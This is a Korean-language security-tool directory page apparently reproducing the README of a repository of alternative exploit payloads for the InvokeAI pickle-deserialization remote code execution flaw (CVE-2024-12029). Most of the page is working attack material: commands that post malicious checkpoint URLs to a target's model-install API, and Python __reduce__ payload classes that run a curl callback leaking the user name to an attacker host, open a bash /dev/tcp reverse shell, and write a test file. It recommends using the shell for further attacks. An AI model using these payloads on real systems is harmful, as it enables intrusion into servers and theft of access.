Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE — 이 저장소는 SSH 키 주입이 실패할 때 InvokeAI RCE 취약점(CVE-2024-12029)에 대한 대체 페이로드 접근 방식을 포함합니다. 페이로드는 pickle 역직렬화가 실제로 발생하는지 테스트하고 대체 액세스 방법을 제공하도록 설계되었습니다. | Kitploit
도구/GitHubGitHub/lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlLearning & EducationRemote Access ToolPayload Development
GitHub
lu3ky13/alternative-approach-reverse-shell-callback-test-invokeai-rce

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

이 저장소는 SSH 키 주입이 실패할 때 InvokeAI RCE 취약점(CVE-2024-12029)에 대한 대체 페이로드 접근 방식을 포함합니다. 페이로드는 pickle 역직렬화가 실제로 발생하는지 테스트하고 대체 액세스 방법을 제공하도록 설계되었습니다.

저장소 보기
85개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Alternative-Approach-Reverse-Shell-Callback-Test-InvokeAI-RCE

대안 접근법: 리버스 셸 및 콜백 테스트

개요

이 저장소는 SSH 키 주입이 실패할 때 InvokeAI RCE 취약점(CVE-2024-12029)에 대한 대안 페이로드 접근 방식을 포함합니다. 페이로드는 pickle 역직렬화가 실제로 발생하는지 테스트하고 대체 접근 방법을 제공하도록 설계되었습니다.

문제 설명

SSH 키 주입 페이로드가 성공적으로 전달(Status 201)되었지만 SSH 접속에 여전히 비밀번호가 필요한 경우, 이는 다음 중 하나를 나타냅니다:

  1. pickle 역직렬화가 발생하지 않음
  2. 명령어가 차단/샌드박싱되고 있음
  3. 실행 방식이 호환되지 않음

해결책: 대안 페이로드

📁 페이로드 파일

리버스 셸 페이로드

  • payload_reverse_bash.ckpt (89 bytes) - Bash 리버스 셸
  • payload_reverse_python.ckpt (267 bytes) - Python 리버스 셸
  • payload_reverse_nc.ckpt (70 bytes) - Netcat 리버스 셸

테스트 및 검증 페이로드

  • payload_callback_test.ckpt (115 bytes) - 역직렬화 확인을 위한 HTTP 콜백
  • payload_test.ckpt (90 bytes) - 간단한 파일 생성 테스트
  • payload_alt_exec.ckpt (223 bytes) - 대체 실행 방식

SSH 페이로드 (참고용)

  • payload_ssh_simple.ckpt (271 bytes) - 리눅스 호환 SSH 키 주입

🛠️ 테스트 스크립트

Kali 테스트 스크립트

  • kali_reverse_test.py - 종합 테스트 스위트

페이로드 생성기

  • reverse_shell_payload.py - 리버스 셸 페이로드 생성

🚀 빠른 사용법

1. 페이로드 서버 시작

python web_server.py --port 8000

2. 콜백 테스트 (먼저 권장)

# Copy kali_reverse_test.py to Kali and run:
python3 kali_reverse_test.py
# Choose option 1 to test callback

3. 리버스 셸 테스트

# Start listener on Kali:
nc -lvnp 4444

# Send reverse shell payload:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_reverse_bash.ckpt', 'inplace': 'true'}, json={})"

4. 간단한 실행 테스트

# Test basic command execution:
python3 -c "import requests; requests.post('http://192.168.117.218:9090/api/v2/models/install', params={'source': 'http://192.168.45.168:8000/payload_test.ckpt', 'inplace': 'true'}, json={})"

# Verify file creation:
ssh [email protected] 'cat /tmp/payload_test.txt'

📊 테스트 결과 해석

✅ 콜백 테스트 성공

  • 의미: pickle 역직렬화가 작동하고 있음
  • 다음 단계: 리버스 셸 또는 대체 SSH 페이로드 시도
  • 확인: HTTP 콜백에 대한 웹 서버 로그 확인

✅ 리버스 셸 성공

  • 의미: 명령어가 실행되고 네트워크 접근이 작동함
  • 결과: netcat 리스너를 통한 직접 셸 접근
  • 다음 단계: 추가 공격을 위해 리버스 셸 사용

✅ 테스트 파일 생성됨

  • 의미: 기본 명령어 실행이 작동함
  • 다음 단계: 대체 SSH 주입 방법 시도
  • 확인: 대상에서 /tmp/payload_test.txt 확인

콜백 페이로드

class CallbackTestPayload:
    def __reduce__(self):
        import os
        command = 'curl "http://192.168.45.168:8000/callback?success=1&user=$(whoami)"'
        return (os.system, (command,))

리버스 셸 페이로드

class ReverseShellPayload:
    def __reduce__(self):
        import os
        command = f'bash -c "bash -i >& /dev/tcp/192.168.45.168/4444 0>&1"'
        return (os.system, (command,))

테스트 페이로드

class TestPayload:
    def __reduce__(self):
        import os
        return (os.system, ('echo "PAYLOAD_EXECUTED_$(date)" > /tmp/payload_test.txt',))

📚 참고 자료

  • CVE-2024-12029: InvokeAI 원격 코드 실행
  • PyTorch 불안전 역직렬화: torch.load() 취약점
  • Pickle reduce: Python 객체 직렬화 악용

⚠️ 면책 조항

이 저장소는 교육 및 공인된 보안 테스트 목적으로만 제공됩니다. 사용자는 시스템을 테스트하기 전에 적절한 권한을 획득했는지 확인할 책임이 있습니다.

도구 다운로드